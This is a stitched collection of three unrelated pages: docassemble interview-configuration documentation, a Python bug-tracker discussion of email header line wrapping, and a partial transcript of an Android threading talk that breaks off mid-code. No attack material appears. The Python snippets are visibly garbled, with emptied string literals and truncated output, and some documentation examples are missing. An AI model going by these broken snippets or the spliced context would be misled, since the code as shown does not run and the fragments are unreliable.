field: gender choices: - Male - Female - Something else section: demographic --- mandatory: True question: | What kind of belly button do you have? field: belly_button choices: - Innie - Outie --- mandatory: True question: | What is your favorite fruit? fields: - Favorite fruit: favorite_fruit section: prefs --- mandatory: True question: | What is your favorite vegetable? fields: - Favorite vegetable: favorite_vegetable --- mandatory: True question: Thank you. subquestion: | ${ first_name }, Your answers mean a lot to me. I am going to go eat some ${ favorite_vegetable } now. section: conclusion The keywords for section names need to be valid Python names. When choosing keywords, make sure not to use the names of variables that already exist in your interview. This is because the keywords can be used to make the left-hand navigation bar clickable. If a keyword for a section is a variable that exists in the interview, clicking on the section will cause an action to be launched that seeks a definition of that variable. The recommended way to use this feature is to set up review blocks that have event set to the keyword of each section that you want to be clickable. 
sections: - intro: Introduction - about: About you subsections: - contact: Contact info - demographic: Demographics - prefs: Preferences - conclusion: Conclusion --- event: contact section: contact question: | Review contact information review: - Edit name: first_name button: | Name: ${ first_name } ${ last_name } - Edit e-mail: email_address button: | E-mail: ${ email_address } --- event: demographic section: demographic question: | Review demographic information review: - Edit gender: gender button: | Gender: ${ gender } - Edit belly button: belly_button button: | Belly button: ${ belly_button } --- event: prefs section: prefs question: | Preferences review: - Edit fruit: favorite_fruit button: | Favorite fruit: ${ favorite_fruit } - Edit vegetable: favorite_vegetable button: | Favorite vegetable: ${ favorite_vegetable } Note that if you use review blocks in an interview with sections, every question should have a section defined. Otherwise, when your users jump around the interview, their section may not be appropriate for the question they are currently answering. Alternatively, you could use code blocks and the nav.set_section() function to make sure that the section is set appropriately. By default, users are only able to click on sections that they have visited. 
If you want users to be able to click on any section at any time, set progressive to False: sections: - intro: Introduction - about: About you subsections: - contact: Contact info - demographic: Demographics - prefs: Preferences - conclusion: Conclusion progressive: False --- event: intro code: | force_ask('sees_nav_bar') --- event: about code: | force_ask('intro_to_about_you') --- event: contact code: | force_ask('first_name', 'email_address') --- event: demographic code: | force_ask('gender', 'belly_button') --- event: prefs code: | force_ask('favorite_fruit', 'favorite_vegetable') --- event: conclusion code: | force_ask('final_screen') --- features: navigation: True Assisting users with interview help --- interview help: heading: How to use this web site content: | Answer each question. At the end, you will get a prize. --- An interview help block adds text to the “Help” page of every question in the interview. If the question has help text of its own, the interview help will appear after the question-specific help. You can also add audio to your interview help: --- interview help: heading: How to use this web site audio: answer_each_question.mp3 content: | Answer each question. At the end, you will get a prize. --- You can also add video to help text using the video specifier. See the question modifiers section for an explanation of how audio and video file references work. You can also provide a label as part of the interview help. This label will be used instead of the word “Help” in the navigation bar as a label for the “Help” tab. --- interview help: label: More info heading: More information about this web site content: | If you are not sure what the right answer is, provide your best guess. You are answering these questions under the pains and penalties of perjury. Your answers will be shared with the special prosecutor.
--- Note that if you provide question-specific help, and you include a label as part of that help, that label will override the default label provided in the interview help (except if question help button is enabled). Mako functions: def def: adorability mako: | <%def name="describe_as_adorable(person)"> \ ${ person } is adorable. \ </%def> A def block allows you to define Mako “def” functions that you can re-use later in your question or document templates. You can use the above function by doing: --- question: | ${ describe_as_adorable(spouse) } Am I right? yesno: user_agrees_spouse_is_adorable usedefs: - adorability --- Due to the way docassemble parses interviews, the def block needs to be defined before it is used. Note the \ marks at the end of the lines in the mako definition. Without these marks, there would be an extra newline inserted. You may or may not want this extra newline. Setting the default role default role: client code: | if user_logged_in() and user_has_privilege('advocate'): user = advocate role = 'advocate' else: user = client role = 'client' set_info(user=user, role=role) --- If your interview uses the roles feature for multi-user interviews, the default role specifier will define what role or roles will be required for any question that does not contain an explicit role specifier. When you use the roles feature, you need to have some way of telling your interview logic what the role of the interviewee is. If you include code within the same block as your default role specifier, that code will be executed every time the interview logic is processed, as if it was marked as initial. For this reason, any default role specifier that contains code should be placed earlier in the interview file than any initial or mandatory questions or code blocks. In the example above, the interview has two roles: “client” and “advocate”. The special variables user and role are set in the code block, which is executed every time the interview logic is processed. In addition, the set_info() function is called.
This lets the linguistic functions know who the user is, so that questions can ask “What is your date of birth?” or “What is John Smith’s date of birth” depending on whether the current user is John Smith or not. Setting the default language --- default language: es --- This sets the language to use for all of the remaining questions in the file for which the language modifier is not specified. The purpose of this is to save typing; otherwise you would have to set the language modifier for each question. Note that this does not extend to questions in included files. If your interview only uses one language, it is not necessary to (and probably not a good idea to) set a default language. See language support for more information about how to create multi-lingual interviews. See question modifiers for information about the language setting of a question. Translation files One way that docassemble supports multi-lingual interviews is through the language modifier on a question and the default language block, which sets a default value for the language modifier. Your interview can contain questions in English that don’t have a language modifier, and questions in French that have the language: fr modifier set. If the current language in an interview (as determined by the set_language() function) is French ( fr), then when docassemble seeks a block to set a given variable, it will search the French blocks first. This method of creating multi-lingual interviews is good if the person who translates text from English to French is someone who understands how docassemble YAML files work. There is another method of creating multi-lingual interviews that may be preferable if the translator is someone who does not understand how docassemble YAML files work. This second method extracts the phrases from an interview (specifically, everywhere in the YAML where Mako templating is allowed) and lists them all in an Excel spreadsheet. 
The spreadsheet can then be given to a French translator, and the translator fills out a column in the spreadsheet with the translation of each phrase. Then the completed spreadsheet can be stored in the sources folder of a package and referenced in an interview using the translations block: translations: - custody.xlsx Then, if the current language in an interview is French, the interview will use the French version of each phrase. This allows you to support multi-lingual interviews while having a code base that is all in one language. To obtain such a spreadsheet for a given interview, visit the Utilities page and go to the section called Download an interview phrase translation file. The translations block is only capable of defining translations for blocks that come after the translations block. Therefore, it is a good practice to make sure that the translations block is placed as one of the very first blocks in your interview YAML file. See the language support section for more information about how to create multi-lingual interviews. See question modifiers for information about the language setting of a question. Default screen parts The default screen parts block allows you to write Mako and Markdown to create text that will appear by default in parts of the screen on every page. default screen parts: under: | You have seen ${ quantity_noun(counter, 'screen') } of this interview so far. help label: | About continue button label: | Go to next step subtitle: | A _groovy_ interview pre: | The text below **does not** constitute legal advice. submit: | Please re-read the question before moving forward. post: | This interview was generously sponsored by Example, Inc. css class: normalquestion When using this, make sure you do not cause your interview to go into an infinite loop.
If any of your screen parts require information from the user, your interview will need to pose a question to the user to gather that information, but in order to pose the question, it will need the information. To avoid this, you can use the defined() function or other methods. For information about other ways to set defaults for different parts of the screens during interviews, see the screen parts section. Custom validation messages The docassemble user interface uses the jQuery Validation Plugin to pop up messages when the user does not enter information for a required field, or if a number does not meet a minimum, or if an e-mail address is not valid, and other circumstances. The messages that are displayed can be customized in a number of ways. On a server-wide level, the messages can be customized the same way other built-in phrases in docassemble can be customized: using the words directive in the Configuration to make a “translation table” between the built-in text to the values you want to be used in their place. On an interview-wide level, the messages can be customized using a default validation messages block. Within an individual field in a question, you can use the validation messages field modifier to define what validation messages should be used. These will override the default validation messages. Each validation message has a code. In the above example, the codes used were required and max. The complete list of codes is:

- required, for “This field is required.” There is a default text transformation for language en that translates this to “You need to fill this in.” This is the standard message that users see when they fail to complete a required field.
- multiple choice required, for “You need to select one.” This is shown for multiple-choice fields.
- combobox required, for “You need to select one or type in a new value.” This is shown for combobox fields.
- checkboxes required, for “Check at least one option, or check "%s"” This is shown for checkboxes fields with a “None of the above” option. It is also used for yesno fields with uncheck others set, which is shown when the user does not check any of the yesno fields. %s is a code that is replaced with the label of the “None of the above” choice.
- minlength, for “You must type at least %s characters.” This is shown when there is a minlength field modifier.
- maxlength, for “You cannot type more than %s characters.” This is shown when there is a maxlength field modifier.
- checkbox minmaxlength, for “Please select exactly %s.” This is shown when there is a checkboxes field with a minlength field modifier that is the same as the maxlength field modifier.
- checkbox minlength, for “Please select at least %s.” This is shown when there is a checkboxes field with a minlength field modifier set to something other than 1.
- checkbox maxlength, for “Please select no more than %s.” This is shown when there is a checkboxes field with a maxlength field modifier.
- date, for “You need to enter a valid date.” This is shown for date fields when the text entered is not an actual date.
- date minmax, for “You need to enter a date between %s and %s.” This is shown for date fields with min and max set.
- date min, for “You need to enter a date on or after %s.” This is shown for date fields with min set.
- date max, for “You need to enter a date on or before %s.” This is shown for date fields with max set.
- time, for “You need to enter a valid time.” This is shown for time fields.
- datetime, for “You need to enter a valid date and time.” This is shown for datetime fields.
- email, for “You need to enter a complete e-mail address.” This is shown for email fields.
- number, for “You need to enter a number.” This is shown for numeric fields ( number, currency, float, and integer) when the input is not valid.
- min, for “You need to enter a number that is at least %s.” This is shown for numeric fields with a min field modifier.
- max, for “You need to enter a number that is at most %s.” This is shown for numeric fields with a max field modifier.
- file, for “You must provide a file.” This is shown for file upload fields.
- accept, for “Please upload a file with a valid file format.” This is shown for file upload fields with an accept field modifier.

Machine learning training data If you use machine learning in your interviews, then by default, docassemble will use training data associated with the particular interview in the particular package in which the interview resides. If you would like your interview to share training data with another interview, you can use the machine learning storage specifier to point to the training data of another interview. For example, suppose you have developed an interview called child-custody.yml that uses machine learning, and you have built rich training sets for variables within this interview. Then you decide to develop another interview, in the same package, called child-support.yml, which uses many of the same variables. It would be a lot of work to maintain two identical training sets in two places. In this scenario, you can add the following block to the child-support.yml interview: --- machine learning storage: ml-child-custody.json --- ml-child-custody.json is the name of a file in the data/sources directory of the package. This file contains the training data for the child-custody.yml interview. The naming convention for these data files is to start with the name of the interview YAML file, add ml- to the beginning, and replace .yml with .json. Now, both the child-custody.yml and child-support.yml interviews will use ml-child-custody.json as the “storage” area for training data. In the Training interface, you will find this data set under the name child-custody. If you had run the child-support.yml interview before adding machine learning storage, you may still see a data set called child-support in the Training interface.
If you are using the Playground, you may see a file called ml-child-support.json in the Sources folder. To get rid of this, go into the Playground and delete the ml-child-support.json file from the Sources folder. Then go into the Training interface and delete any “items” that exist within the child-support interview. If you want, you can set machine learning storage to a name that does not correspond with an actual interview. For example, you could include machine learning storage: ml-family-law.json in both the child-custody.yml and child-support.yml interviews. Even though there is no interview called family-law.yml, this will still work. If you are using the Playground, a file called ml-family-law.json will automatically be created in the Sources folder. You can also share “storage” areas across packages. Suppose you are working within a package called docassemble.missourifamilylaw, but you want to take advantage of training sets in a package called docassemble.generalfamilylaw. You can write: --- machine learning storage: docassemble.generalfamilylaw:data/sources/ml-family.json --- For more information about managing training data, see the machine learning section on packaging your training sets Optional features The features block sets some optional features of the interview. Whether debugging features are available If the debug directive in the Configuration is True, then by default, the navigation bar will contain a “Source” link that shows information about how the interview arrived at the question being shown. If the debug directive is False, then this will not be shown. This can be overridden in the features by setting debug to True or False depending on the behavior you want. The following example demonstrates turning the debug feature off. On the server that hosts the demonstration interviews, the debug directive is True, so the “Source” link is normally shown. Setting debug: False makes the “Source” link disappear. 
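A minimal sketch of overriding the server-wide debug behavior for one interview, as described above:

```yaml
features:
  debug: False
```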
Whether interview is centered If you do not want your interview questions to be centered on the screen, set centered to False. Progress bar The progress bar feature controls whether a progress bar is shown during the interview. You can use the progress modifier or the set_progress() function to indicate the setting of the progress bar. If you want the progress bar to display the percentage, include show progress bar percentage: True: By default, if you do not set the progress modifier on a question, then each time the user takes a step, the progress bar will advance 5% of the way toward the end. The 5% figure is known as the progress bar multiplier and it is configurable: features: progress bar: True progress bar multiplier: 0.01 The default is 0.05. If you set progress bar method: stepped, the progress bar advances a different way when there is no progress modifier. features: progress bar: True progress bar method: stepped Instead of advancing toward 100%, it advances toward the next greatest progress value that is defined on a question in the interview. (Note that docassemble cannot predict the future, so whether the question with the next highest progress value will actually be reached is unknown; docassemble just looks at all the questions in the interview that have progress values defined.) The amount by which it advances is determined by progress bar multiplier. To use the default method for advancing the progress bar, omit progress bar method, or set it to default. features: progress bar: True progress bar method: default Navigation bar The navigation feature controls whether a navigation bar is shown during the interview. You can use the sections initial block or the nav.set_sections() function to define the sections of your interview. The section modifier or the nav.set_section() function can be used to change the current section. Note that the section list is not shown on small devices, such as smartphones. 
To show a smartphone user a list of sections, you can use the nav.show_sections() function. If you want the navigation bar to be horizontal across the top of the page, set navigation to horizontal: Back button style By default, there is a “Back” button located in the upper-left corner of the page. (However, the “Back” button is not present when the user is on the first page of an interview, or the prevent_going_back() function has been used, or the prevent going back modifier is in use.) Whether this back button is present can be controlled using the navigation back button feature. This will hide the “Back” button: features: navigation back button: False You can also place a “Back” button inside the body of a question, next to the other buttons on the screen, by setting the question back button feature to True (the default is False). You can also place a “Back” button inside the body of a question on some questions but not others, using the back button modifier. Help tab style When interview help is available, or the help modifier is present on a question, the “Help” tab will be present in the navigation bar. When the help modifier is present, the “Help” tab is highlighted yellow and marked with a yellow star. When the user presses the help tab, the help screen will be shown. If you set the question help button to True, users will be able to access the help screen by pressing a “Help” button located within the body of the question, to the right of the other buttons on the page. When question help button is True, the “Help” tab will not be highlighted yellow. Here is an interview in which the question help button is not enabled (which is the default). 
features: question help button: False --- Here is the same interview, with the question help button feature enabled: features: question help button: True --- Note that when question help button is enabled, the label for the help tab in the navigation bar always defaults to “Help” or to the label of the interview help, and it is not highlighted yellow when question-specific help is available. Positioning labels above fields By default, the docassemble user interface uses Bootstrap’s horizontal form style. If you want your interview to use the Bootstrap’s standard style, set labels above fields to True: features: labels above fields: True Hiding the standard menu items By default, the menu in the corner provides logged-in users with the ability to edit their “Profile” and the ability to go to “My Interviews,” which is a list of interview sessions they have started. If you want to disable these links, you can use the hide standard menu specifier: features: hide standard menu: True If you want to add any of these links manually, or add them with different names, you can do so with the menu_items special variable and the url_of() function. mandatory: True code: | menu_items = [ {'label': 'Edit my Profile', 'url': url_of('profile')}, {'label': 'Saved Sessions', 'url': url_of('interviews')} ] Javascript and CSS files If you are a web developer and you know how to write HTML, Javascript, and CSS, you can embed HTML in your interview text. You can also bring Javascript and CSS files into the user’s browser. For example, the following interview brings in a Javascript file, my-functions.js, and a CSS file, my-styles.css, into the user’s browser. These files are located in the data/static folder of the same package in which the interview is located. 
The contents of my-functions.js are: $(document).on('daPageLoad', function(){ $(".groovy").html("I am purple"); }); The contents of my-styles.css are: .groovy { color: purple; } You can write whatever you want in these files; they will simply be loaded by the user’s browser. Note that your Javascript files will be loaded after jQuery is loaded, so your code can use jQuery, as this example does. If you have Javascript code that you want to run after each screen of the interview is loaded, attach a jQuery event handler to document for the event daPageLoad, which is a docassemble-specific event that is triggered after each screen loads. (Since docassemble uses Ajax to load each new screen, if you attach code using jQuery’s ready() method, the code will run when the browser first loads, but not every time the user sees a new screen.) The example above demonstrates this; every time the page loads, the code will replace the contents of any element with the class groovy. This example demonstrates bringing in CSS and Javascript files that are located in the data/static directory of the same package as the interview. You can also refer to files in other packages: features: css: docassemble.demo:data/static/my.css or on the internet at a URL: features: javascript: Also, if you want to bring in multiple files, specify them with a YAML list: features: css: - my-styles.css - javascript: - - If you want to include CSS or Javascript code in a specific question, rather than in all questions of your interview you can use the script and css modifiers. The HTML of the screen showing a question contains a number of placeholder CSS classes that are not used for formatting, but that are available to facilitate customization: - If a questionis tagged with an id, the <body>will be given a class beginning with question-followed by the id, except that the idwill be transformed into lowercase and non-alphanumeric characters will be converted into hyphens. 
For example, if the idis Intro screen, the class name will be question-intro-screen. <fieldset>s are tagged with classes like field-yesnoand field-buttons. <div>s that contain fields are tagged with classes like field-container, field-container-datatype-area, field-container-inputtype-combobox, and other classes. For more information, use the DOM inspector in your web browser to see what the class names are and which elements have the class names. Example use of JavaScript: charting Here is an example interview that uses a javascript feature and a script modifier to draw a doughnut chart using chart.js. features: javascript: --- mandatory: True question: Your stuff subquestion: | <div class="chart-container" style="position: relative; height:450px; width:100%"> <canvas id="myChart" width="600" height="400"></canvas> </div> script: | <script> var ctx = $("#myChart"); var myDoughnutChart = new Chart(ctx, { type: 'doughnut', data: ${ json.dumps(data) } }); </script> --- code: | data = {'datasets': [{'data': [how_many[y] for y in things], 'backgroundColor': [color[y] for y in range(len(things))]}], 'labels': things} --- variable name: color data: - '' Here is an example interview that draws a pie chart using Google Charts. 
features: javascript: --- mandatory: True question: Your stuff subquestion: | <div id="piechart" style="width: 100%; min-height: 450px;"></div> script: | <script type="text/javascript"> google.charts.load('current', {'packages':['corechart']}); google.charts.setOnLoadCallback(drawChart); function drawChart() { var chartwidth = $('#piechart').width(); var data = google.visualization.arrayToDataTable(${ json.dumps(data) }); var options = { title: ${ json.dumps(title) }, width: chartwidth, chartArea: {width: chartwidth, left: 20, top: 20, height: chartwidth*0.75} }; var chart = new google.visualization.PieChart(document.getElementById('piechart')); chart.draw(data, options); } </script> --- code: | title = "Household stuff" data = [['Thing', 'How many']] + [[y, how_many[y]] for y in things] Bootstrap theme Using the bootstrap theme feature, you can change the look and feel of your interview’s web interface by instructing your interview to use a non-standard CSS file in place of the standard CSS file used by Bootstrap. The file can be referenced in a number of ways: lumen.min.css: the file lumen.min.cssin the “static” folder of the current package. docassemble.demo:lumen.min.css: the file lumen.min.cssin the “static” folder ( data/static/) of the docassemble.demopackage. docassemble.demo:data/static/lumen.min.css: the same.: a file on the internet. For more information about using custom Bootstrap themes, and for information about applying themes on a global level, see the documentation for the bootstrap theme configuration directive. Inverted Bootstrap navbar By default, docassemble uses Bootstrap’s “dark” (formerly known as “inverted”) style of navigation bar so that the navigation bar stands out from the white background. If you do not want to use the inverted navbar, set the inverse navbar feature to False. To make this change at a global level, see the inverse navbar configuration directive. 
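As a sketch, the two settings just described can be combined in one features block (the theme filename is one of the examples mentioned above):

```yaml
features:
  bootstrap theme: lumen.min.css
  inverse navbar: False
```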
Hiding the navbar

By default, docassemble shows a navigation bar at the top of the screen. To make it disappear, you can set hide navbar: True.

Width of tables in attachments

As explained more fully in the tables section, if you include a table in an attachment and the table is too wide, or not wide enough, you can change the default character width of tables from 65 to some other value using the table width specifier within the features block.

features:
  table width: 75

Disabling document caching

By default, docassemble caches assembled documents for performance reasons. To disable the document caching feature for a given interview, set cache documents to False.

features:
  cache documents: False

Producing PDF/A files

If you want the PDF files produced by your interview to be in PDF/A format, you can set this as a default:

features:
  pdf/a: True

The default is determined by the pdf/a configuration directive. The setting can also be made on a per-attachment basis by setting the pdf/a attachment setting. When using a docx template file, you also have the option of creating a "tagged PDF," which is similar to PDF/A. You can set this as an interview-wide default:

features:
  tagged pdf: True

The default is determined by the tagged pdf configuration directive. This setting can also be made on a per-attachment basis by setting the tagged pdf attachment setting.

Limiting size of uploaded images

If your users upload digital photos into your interviews, the uploads may take a long time. Images can be reduced in size before they are uploaded. To set this as the default for all uploads in your interview, set maximum image size in the features block of your interview. In this example, images will be reduced in size so that they are no taller than 100 pixels and no wider than 100 pixels. Note that the image file type of the uploaded file may be changed to PNG during the conversion process. Different browsers behave differently.
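The example block for the 100-pixel limit described above appears to have been lost in extraction; a minimal sketch of what it would look like (the value 100 comes from the surrounding text):

features:
  maximum image size: 100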
This is just a default value; you can override it by setting the maximum image size in a field definition. If you have an interview-wide default, but you want to override it for a particular field to allow full-resolution camera uploads, you can set the maximum image size field modifier to None. If you want to use a site-wide default value, set the maximum image size in the configuration.

Converting the format of uploaded images

If you are using maximum image size, you can also cause images to be converted to PNG, JPEG, or BMP by the browser during the upload process by setting the image upload type to png, jpeg, or bmp.

Going full screen when interview is embedded

It is possible to embed a docassemble interview in a web page using an iframe. However, the user experience on mobile is degraded when an interview is embedded. If you want the interview to switch to "full screen" after the user moves to the next screen in the embedded interview, you can do so. Within a features block, include go full screen: True.

features:
  go full screen: True
---
question: |
  Let's go on a quest!
subquestion: |
  How exciting would you like your quest to be?
field: excitement_level
choices:
  - Thrilling
  - Interesting
  - Soporific
---
question: |
  We are nearing the end of the quest.
field: quest_almost_over
---
question: |
  We have finished the quest.
buttons:
  - Return: exit
    url: |
      ${ referring_url() }
need:
  - excitement_level
  - quest_almost_over
mandatory: True

For more information about implementing an embedded interview like this, see the HTML source of the web page used in this example. Note that in this example, the user is provided with an exit button at the end of the interview that directs the user back to the page that originally embedded the interview. This is accomplished by setting the url of the exit button to the result of the referring_url() function. If you only want the interview to go full screen if the user is using a mobile device, use go full screen: mobile.
features:
  go full screen: mobile
---
code: |
  if device().is_mobile or device().is_tablet:
    on_mobile = True
  else:
    on_mobile = False
---
mandatory: True
code: |
  excitement_level
  quest_almost_over
  if on_mobile:
    final_screen_mobile
  else:
    final_screen_desktop
---
question: |
  Let's go on a quest!
subquestion: |
  % if on_mobile:
  I see you are using a mobile device.
  % else:
  I see that you are not using a mobile device.
  % endif

  How exciting would you like your quest to be?
field: excitement_level
choices:
  - Thrilling
  - Interesting
  - Soporific
---
question: |
  We are nearing the end of the quest.
field: quest_almost_over
---
event: final_screen_mobile
question: |
  We have finished the quest.
buttons:
  - Return: exit
    url: |
      ${ referring_url() }
---
event: final_screen_desktop
question: |
  We have finished the quest.

Note that this example provides a different ending screen depending on whether the user is on a desktop or a mobile device. If a desktop user is viewing the interview in an iframe on a web site, the interview should not provide an exit button that takes the user to a web site, because then the user will see a web site embedded in a web site. The interview in this example uses the device() function to detect whether the user is using a mobile device. Note that the interview logic looks both at device().is_mobile as well as device().is_tablet. This corresponds with the functionality of go full screen: mobile, which will make the interview go full screen if the user has either a mobile phone or a tablet.

Infinite loop protection

The infinite loop protection section of the configuration documentation explains how you can change the default limits on recursion and looping for all interviews on the server. You can also set these limits on a per-interview basis using the loop limit and recursion limit features.

features:
  loop limit: 600
  recursion limit: 600
https://docassemble.com.br/docs/initial.html
Created on 2014-02-23 17:59 by rednaw, last changed 2014-02-24 16:09 by r.david.murray.

If you look at the `header_encode` method in the `Charset` class in `email.charset`, you'll see that depending on the `header_encoding` that is set on the `Charset` instance, it will either encode it using base64 or quoted-printable (QP):

However, QP always uses `maxlinelen=None` and base64 doesn't. This results in the following behaviour:

- If you use base64 encoding and your header size is longer than the default `maxlinelen`, it will be split over multiple lines.
- If you use QP encoding with the same header it doesn't get split over multiple lines.

You can easily test it with this snippet:

from email.charset import Charset, BASE64, QP

header = ( ' )

charset = Charset('utf-8')
charset.header_encoding = BASE64
print 'BASE64:'
print charset.header_encode(header)

charset.header_encoding = QP
print 'QP:'
print charset.header_encode(header)

Which will output:

BASE64:
=?utf-8?b?dGVqa3N0aiB0bGtqZXMgdGFrbGRqZiBhc2VpbyBuZWFvaWZsayBhc25mb2llYXMg?=
=?utf-8?b?bmZsa2RhbiBmb2VpYXMgbmFza2xuIGlvZWFzbiBrbGRhbiBmbGthbnNvaWUgbmFz?=
=?utf-8?b?bGsgZG5hc2xrIGZuZGFzbGsgZm5lb2lzYWYgbmVrbGFzbiBkZmtsYXNuZiBvaWFz?=
=?utf-8?b?ZW5mIGxrYWRzbiBsa2ZhbmxkayBmYXMgZGZrbmFpb2UgbmFz?=
QP:
=?utf-8?q?=

This is inconsistent behavior. Aside from that, I think the `header_encode` method should accept an argument `maxlinelen` that defaults to an appropriate value (probably 76), but which you can override at will. This is (I think) also necessary because the `Header` class in `email.header` has a `maxlinelen` attribute that is used for the same purpose. Normally this works fine, but when you specify a charset for your header, it uses the `Charset` class and the `maxlinelen` is lost. This is happening here: You see, the `_encode_chunks` takes the `maxlinelen` argument but doesn't pass it on to the `header_encode` method of `charset` (which is a `Charset` instance).
As such, you can see this issue in action with the following snippet:

from email.header import Header

maxlinelen = 9999999

print 'No charset:'
print Header( ', maxlinelen=maxlinelen ).encode()

print 'Charset with special characters:'
print Header( ', maxlinelen=9999999 ).encode()

Which will output:

No chars
Charset with special characters:
==?=

This is currently an issue we're experiencing in Django, see our issue in the issue tracker:

The line wrapping is done by Header, not header_encode. The bug appears to be that maxlinelen=None is not passed to base64mime's header_encode the way it is to quoprimime's header_encode...and that base64mime doesn't handle a maxlinelen of None. Using maxlinelen=9999999 in the base64mime.header_encode call, your base64 example also results in a single line header. This should be fixed. It does not affect python3, which uses a different folding algorithm.

Line wrapping is indeed done by `Header`, but why do `base64mime` and `quoprimime` then have their own line wrapping? I assume so that you can also use them independently. So that's why I would think `Charset.header_encode` should also accept a `maxlinelen` so that you can use `Charset` independently too.

I've no clue, to tell you the truth. Those APIs evolved long before I took over email package maintenance. And since we are talking about 2.7, we can't change the existing API. In Python3, Charset.header_encode will as of 3.5 become a legacy interface, so there's not much point in changing it there either, although it is not out of the question if there is a use case.

Ok, so you suggest using `maxlinelen=None` for the `base64mime.header_encode`, which will act the same as giving `maxlinelen=None` to `email.quoprimime`, so that we don't need to change the API? And this change would then also be reflected in the Python 3.5 legacy interface?
Well, we have to make base64mime.header_encode also handle a None value...so perhaps instead we should just use 10000, which is what the Header wrapping code in python3 does. Python3's Header doesn't have this bug. Ok, do you think there's any risk in making `base64mime.header_encode` handle `maxlinelen=None`? I think it would be more consistent if `base64mime.header_encode` and `quoprimime.header_encode` interpret their arguments similarly. Well, there's the usual API change risk: something that works on 2.7.x doesn't work on 2.7.x-1. So since we can fix the bug without making the API change, I think we should. That wasn't clear. By "something that works" I mean exactly what you are talking about: someone writing code using these functions would naturally try to use None with base64mime, and if we make it work, that would work fine in 2.7.x, but mysteriously break if run on an earlier version of 2.7. So instead we force the author of new code to use a non-None value that will in fact work in previous versions of 2.7.
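As the thread notes, Python 3's Header does its own folding, so base64-encoded and QP-encoded headers wrap consistently there. A small Python 3 sketch illustrating that folding; the sample text and the 76-character limit are arbitrary choices for the demo:

```python
from email.header import Header

# Non-ASCII text forces an encoded word; utf-8's header encoding is base64,
# so the result is a series of =?utf-8?b?...?= chunks.
long_text = "é" * 60
h = Header(long_text, charset="utf-8", maxlinelen=76)
encoded = h.encode()

print(encoded)  # folded into several encoded words, one per line
```

Because the Header object owns the folding, the same maxlinelen is honored whether the charset's header encoding happens to be base64 or quoted-printable.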
http://bugs.python.org/issue20747
Welcome to async tasks, threads, pools, and executors. Oh, my! So many aspects of threading and thread management are Android-specific. In her talk from 360|AnDev, Stacy Devino covers the essentials of the various schools of thought on these topics.

Why Learn Multithreading? (0:44)

I consider multithreading a core skill of the modern developer. Even when we're talking about the phones in our pockets, for the most part, they're quad core, with lots of RAM, and faster than your computer in 2005! We basically need the ability to run multiple tasks concurrently. As humans, we can move both of our arms independently, and both of our legs independently. You are able to accomplish different tasks with them. To demonstrate what you are asking your phone to do on a continuous basis, I want you (yes, the you who is reading this) to try and pat your head and rub your stomach at the same time. It's really hard, isn't it? When we think about the concepts of multithreaded programming, we have to think about the fact that we have essentially asked our phones to pat their head and rub their stomach at the same time. Fortunately for us, they're computers, not people, so we can make them do our bidding.

What is a Thread? (2:01)

A thread is an independent execution worker. It is the worker bee. You are the queen bee, and you get to tell the worker bee what to do. All of Android works on the basis of threads, even when we're talking about a Hello World app. A Hello World app primarily runs in what we consider a single thread, your main thread. You'll also see people call it their "UI thread," although main thread is probably the best construct. You need to know how to do threading if you want to:

- Do anything within logins
- Load more information
- Cache information
- Use web and RESTful APIs
- Perform tasks in the background that don't cause your app to stall

4 Basic Thread Types (3:20)

Android has four basic types of threads.
You'll see other documentation talk about even more, but we're going to focus on Thread, Handler, AsyncTask, and something called HandlerThread. You may have heard HandlerThread just called the "Handler/Looper combo". As long as you know how one of these four categories works, you can understand what's actually going on in the background for things like Futures, IntentService, Jobs, and Alarms.

Basic Thread (4:31)

So let's talk about a basic Thread example.

long rootRandom = System.currentTimeMillis();

private class RandomThread extends Thread {
    long seed;

    RandomThread(long seed) {
        this.seed = seed;
    }

    @Override
    public void run() {
        Random seededRandom = new Random(seed);
        rootRandom = seededRandom.nextInt();
    }
}

We have something where we want to compute what I'm calling a rootRandom, like a seededRandom value. If you do something like encryption, this would be a direct analog. If I want to make this run in the background, I need to declare all this stuff, and pass in my long integer. It would then compute that seededRandom value in the background that I would perhaps use somewhere else. Why would I want to have encryption or a rootRandom value computed in the background? Because sometimes they're very, very big. Also, sometimes we don't think about the fact that an operation that we're asking for, or that we actually need for our application, takes a lot of compute cycles. It can take a lot of values. If you know Java, this is the basic example of how they generate a thread.

Handler (5:47)

Every so often, I need to send a signal to somewhere else that this process is still alive, or that my app is still running, or that I have a piece of information that's just a kind of timed element, otherwise known as maybe a TimerTask.
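As a quick aside before moving on to Handler: the basic Thread example above can be exercised as a standalone sketch. The class and field names mirror the snippet; the seed value and the wrapping demo class are made up for illustration:

```java
import java.util.Random;

public class RandomThreadDemo {
    // Shared result written by the worker thread; volatile so any thread
    // reading it sees the latest write.
    static volatile long rootRandom = System.currentTimeMillis();

    static class RandomThread extends Thread {
        final long seed;

        RandomThread(long seed) {
            this.seed = seed;
        }

        @Override
        public void run() {
            rootRandom = new Random(seed).nextInt();
        }
    }

    public static void main(String[] args) throws InterruptedException {
        RandomThread worker = new RandomThread(42L);
        worker.start();  // run() executes on the worker thread
        worker.join();   // wait for it to finish before reading the result
        System.out.println(rootRandom);
    }
}
```

Calling join() is what makes reading the result safe here; in a real app you would usually post the result back to the main thread rather than block on join().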
But here, we're actually using it with a Runnable and a Handler:

private Handler mHandler = new Handler();
private int lifeSignDelay = 5000;

private Runnable mainRunnable = new Runnable() {
    @Override
    public void run() {
        sendLifeSign(true);
        mHandler.postDelayed(mainRunnable, lifeSignDelay);
    }
};

Handler is its own special type of thread in the background. If I want to have things that are executed in services, or in other parts of the application, I can do it really, really simply just by this code. I'm just declaring a new Handler, and then I assign some random number, right? Then I have a Runnable that I then execute in the Handler. When I've actually sent my lifeSign, I just post delay it. That means that I can have it continually run and self-propagate, but it also means that I'm allowing other things to run without interfering with it. I'm also not holding the objects in that thread for any longer than I need to. It will generate as necessary, so that's really, really useful. Knowing about Handler, we can do a lot of things that allow us to have communication with UI and main threads. Plus, it's really good with stuff like messaging tasks.

Async Task (7:49)

AsyncTask can only be called from an Activity on your main thread. That sucks, because sometimes you have things like Services, or other external classes that you want to have actually be able to run separated tasks. However, there are some specific reasons why they made this helper thread. This thread helps you accomplish things without having to know a lot about what's actually happening in the background. Let's assume that I have made a new Activity, and I wanted to load an image into an ImageView. But I still want the user to be able to scroll up and down while I'm loading that task. So, what would be a good thing for me to use is AsyncTask:

public class MyUIActivity extends AppCompatActivity {
    //....
    private ImageView mImageView;  // assigned in onCreate() via findViewById(R.id.someView)

    // onCreate and all other setup contained above

    // Usage - inside of a function or from an onClick:
    //     new DownloadImageTask().execute("");

    // AsyncTask
